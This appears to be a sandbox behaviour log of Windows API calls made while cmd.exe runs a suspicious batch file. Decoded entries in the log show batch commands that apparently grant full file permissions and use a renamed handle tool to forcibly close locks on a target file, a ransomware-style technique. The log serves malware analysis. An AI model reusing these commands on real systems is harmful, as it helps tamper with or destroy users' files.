wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0163.048] SetEnvironmentVariableW (lpName="FN", lpValue="\"blank.jtp\"") returned 1 [0163.048] GetProcessHeap () returned 0x440000 [0163.048] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458a98 | out: hHeap=0x440000) returned 1 [0163.048] GetEnvironmentStringsW () returned 0x457f30* [0163.048] GetProcessHeap () returned 0x440000 [0163.048] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb7a) returned 0x45a188 [0163.048] FreeEnvironmentStringsW (penv=0x457f30) returned 1 [0163.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.048] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0163.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.049] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0163.050] _get_osfhandle (_FileHandle=0) returned 0x3 [0163.050] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0163.050] SetConsoleInputExeNameW () returned 0x1 [0163.050] GetConsoleOutputCP () returned 0x1b5 [0163.050] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0163.050] SetThreadUILanguage (LangId=0x0) returned 0x409 [0163.051] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3aef64, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0163.051] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0163.051] _get_osfhandle (_FileHandle=3) returned 0x78 [0163.051] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0163.051] GetProcessHeap () returned 0x440000 [0163.051] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4411d0 | out: hHeap=0x440000) returned 1 [0163.052] GetProcessHeap () returned 0x440000 [0163.052] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4411a0 | out: hHeap=0x440000) returned 1 [0163.052] GetProcessHeap () returned 0x440000 [0163.052] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4576e8 | out: hHeap=0x440000) returned 1 [0163.052] GetProcessHeap () returned 0x440000 [0163.052] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x440d38 | out: hHeap=0x440000) returned 1 [0163.052] GetProcessHeap () returned 0x440000 [0163.052] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x441140 | out: hHeap=0x440000) returned 1 [0163.052] GetProcessHeap () returned 0x440000 [0163.052] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4577e8 | out: hHeap=0x440000) returned 1 [0163.052] GetProcessHeap () returned 0x440000 [0163.052] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4510e0 | out: hHeap=0x440000) returned 1 [0163.052] _get_osfhandle (_FileHandle=3) returned 0x78 [0163.052] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0163.052] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3aef48, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3aef48*=0xa3, lpOverlapped=0x0) returned 1 [0163.052] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0163.052] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0163.053] _get_osfhandle (_FileHandle=3) returned 0x78 [0163.053] GetFileType (hFile=0x78) returned 0x1 [0163.053] _get_osfhandle (_FileHandle=3) returned 0x78 [0163.053] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0163.053] GetProcessHeap () returned 0x440000 [0163.053] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400a) returned 0x464aa8 [0163.054] GetProcessHeap () returned 0x440000 [0163.054] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x70) returned 0x441140 [0163.054] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x3ae6d8, lpFilePart=0x3ae6d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x3ae6d0*="Ch81ANBE.bat") returned 0x32 [0163.054] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3ae3ec | out: lpFindFileData=0x3ae3ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4411b8 [0163.054] FindClose (in: hFindFile=0x4411b8 | out: hFindFile=0x4411b8) returned 1 [0163.054] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3ae3ec | out: lpFindFileData=0x3ae3ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4411b8 [0163.054] FindClose (in: hFindFile=0x4411b8 | out: hFindFile=0x4411b8) returned 1 [0163.054] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0163.054] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3ae3ec | out: lpFindFileData=0x3ae3ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4411b8 [0163.055] FindClose (in: hFindFile=0x4411b8 | out: hFindFile=0x4411b8) returned 1 [0163.055] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x3ae3ec | out: lpFindFileData=0x3ae3ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x4411b8 [0163.055] FindClose (in: hFindFile=0x4411b8 | out: hFindFile=0x4411b8) returned 1 [0163.055] GetProcessHeap () returned 0x440000 [0163.055] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x56) returned 0x4411b8 [0163.055] GetProcessHeap () returned 0x440000 [0163.055] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x464aa8 | out: hHeap=0x440000) returned 1 [0163.057] _tell (_FileHandle=3) returned 78 [0163.057] _close (_FileHandle=3) returned 0 [0163.057] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3aed1c | out: _Buffer="\r\n") returned 2 [0163.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.057] GetFileType (hFile=0x7) returned 0x2 [0163.058] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.058] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aecdc | out: lpMode=0x3aecdc) returned 1 [0163.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.058] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3aed08, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aed08*=0x2) returned 1 [0163.060] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0163.060] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0163.060] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3aed18 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0163.060] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3aed18 | out: _Buffer=">") returned 1 [0163.060] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.060] GetFileType (hFile=0x7) returned 0x2 [0163.060] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.060] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aece0 | out: lpMode=0x3aece0) returned 1 [0163.061] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.061] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3aed0c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3aed0c*=0x26) returned 1 [0163.061] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.061] GetFileType (hFile=0x7) returned 0x2 [0163.062] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.062] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef64 | out: lpMode=0x3aef64) returned 1 [0163.062] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.062] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x440d40*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3aef90, lpReserved=0x0 | out: lpBuffer=0x440d40*, lpNumberOfCharsWritten=0x3aef90*=0x2) returned 1 [0163.062] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3aef9c | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0163.063] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.063] GetFileType (hFile=0x7) returned 0x2 [0163.063] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.063] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef5c | out: lpMode=0x3aef5c) returned 1 [0163.065] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.065] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x3aef88, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aef88*=0x2d) returned 1 [0163.067] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3aefbc | out: _Buffer="\r\n") returned 2 [0163.067] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.067] GetFileType (hFile=0x7) returned 0x2 [0163.067] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.067] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef7c | out: lpMode=0x3aef7c) returned 1 [0163.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.068] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3aefa8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aefa8*=0x2) returned 1 [0163.069] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0163.069] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0163.069] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0163.069] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0163.069] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0163.069] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0163.069] GetConsoleTitleW (in: lpConsoleTitle=0x3aeb2c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0163.071] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3ae8e8, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x3ae8e0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3ae8e0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0163.072] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x3ae684, lpFilePart=0x3ae680 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x3ae680*=0x0) returned 0x26 [0163.072] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0163.072] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3ae400 | out: lpFindFileData=0x3ae400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x456370 [0163.072] FindClose (in: hFindFile=0x456370 | out: hFindFile=0x456370) returned 1 [0163.072] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3ae400 | out: lpFindFileData=0x3ae400*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x456370 [0163.072] FindClose (in: hFindFile=0x456370 | out: hFindFile=0x456370) returned 1 [0163.072] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0163.072] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3ae400 | out: lpFindFileData=0x3ae400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x456370 [0163.072] FindClose (in: hFindFile=0x456370 | out: hFindFile=0x456370) returned 1 [0163.072] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0163.073] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0163.073] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0163.073] GetProcessHeap () returned 0x440000 [0163.073] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45a188 | out: hHeap=0x440000) returned 1 [0163.073] GetEnvironmentStringsW () returned 0x456b80* [0163.073] GetProcessHeap () returned 0x440000 [0163.073] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb7a) returned 0x457f30 [0163.073] FreeEnvironmentStringsW (penv=0x456b80) returned 1 [0163.073] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0163.073] GetProcessHeap () returned 0x440000 [0163.073] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456310 | out: hHeap=0x440000) returned 1 [0163.073] GetProcessHeap () returned 0x440000 [0163.073] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4562b0 | out: hHeap=0x440000) returned 1 [0163.073] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.073] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0163.513] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.513] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0163.514] _get_osfhandle (_FileHandle=0) returned 0x3 [0163.514] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0163.514] SetConsoleInputExeNameW () returned 0x1 [0163.514] GetConsoleOutputCP () returned 0x1b5 [0163.514] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0163.514] SetThreadUILanguage (LangId=0x0) returned 0x409 [0163.515] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3aef64, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0163.515] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0163.515] _get_osfhandle (_FileHandle=3) returned 0x78 [0163.515] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0163.516] GetProcessHeap () returned 0x440000 [0163.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456240 | out: hHeap=0x440000) returned 1 [0163.516] GetProcessHeap () returned 0x440000 [0163.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4561d0 | out: hHeap=0x440000) returned 1 [0163.516] GetProcessHeap () returned 0x440000 [0163.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456160 | out: hHeap=0x440000) returned 1 [0163.516] GetProcessHeap () returned 0x440000 [0163.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4560f0 | out: hHeap=0x440000) returned 1 [0163.516] GetProcessHeap () returned 0x440000 [0163.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x440d38 | out: hHeap=0x440000) returned 1 [0163.516] GetProcessHeap () returned 0x440000 [0163.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x441218 | out: hHeap=0x440000) returned 1 [0163.516] GetProcessHeap () returned 0x440000 [0163.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4411b8 | out: hHeap=0x440000) returned 1 [0163.516] GetProcessHeap () returned 0x440000 [0163.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x441140 | out: hHeap=0x440000) returned 1 [0163.517] _get_osfhandle (_FileHandle=3) returned 0x78 [0163.517] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0163.517] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3aef48, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3aef48*=0x94, lpOverlapped=0x0) returned 1 [0163.519] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0163.519] _get_osfhandle (_FileHandle=3) returned 0x78 [0163.519] GetFileType (hFile=0x78) returned 0x1 [0163.519] _get_osfhandle (_FileHandle=3) returned 0x78 [0163.520] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0163.520] GetProcessHeap () returned 0x440000 [0163.520] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400a) returned 0x464aa8 [0163.520] GetProcessHeap () returned 0x440000 [0163.520] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4008) returned 0x468ac0 [0163.521] GetProcessHeap () returned 0x440000 [0163.521] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe) returned 0x440d38 [0163.521] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"blank.jtp\"") returned 0xb [0163.521] GetProcessHeap () returned 0x440000 [0163.521] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x440d38 | out: hHeap=0x440000) returned 1 [0163.521] GetProcessHeap () returned 0x440000 [0163.521] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x468ac0 | out: hHeap=0x440000) returned 1 [0163.521] GetProcessHeap () returned 0x440000 [0163.521] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x464aa8 | out: hHeap=0x440000) returned 1 [0163.529] _tell (_FileHandle=3) returned 226 [0163.529] _close (_FileHandle=3) returned 0 [0163.529] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3aed1c | out: _Buffer="\r\n") returned 2 [0163.529] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.529] GetFileType (hFile=0x7) returned 0x2 [0163.530] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.530] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aecdc | out: lpMode=0x3aecdc) returned 1 [0163.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.530] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3aed08, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aed08*=0x2) returned 1 [0163.533] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0163.533] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0163.533] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3aed18 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0163.533] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3aed18 | out: _Buffer=">") returned 1 [0163.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.533] GetFileType (hFile=0x7) returned 0x2 [0163.533] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.534] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aece0 | out: lpMode=0x3aece0) returned 1 [0163.534] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.534] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3aed0c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3aed0c*=0x26) returned 1 [0163.534] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x3aef9c | out: _Buffer="FOR") returned 3 [0163.534] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.535] GetFileType (hFile=0x7) returned 0x2 [0163.535] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.535] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef5c | out: lpMode=0x3aef5c) returned 1 [0163.535] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.535] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3aef88, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aef88*=0x3) returned 1 [0163.536] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x3aef9c | out: _Buffer=" /F") returned 3 [0163.536] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.536] GetFileType (hFile=0x7) returned 0x2 [0163.536] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.536] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef5c | out: lpMode=0x3aef5c) returned 1 [0163.537] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.537] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3aef88, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aef88*=0x3) returned 1 [0163.537] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x3aef9c | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0163.537] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.537] GetFileType (hFile=0x7) returned 0x2 [0163.537] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.537] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef5c | out: lpMode=0x3aef5c) returned 1 [0163.538] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.538] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x3aef88, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aef88*=0x20) returned 1 [0163.538] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x3aef9c | out: _Buffer=" %I IN ") returned 7 [0163.538] _get_osfhandle 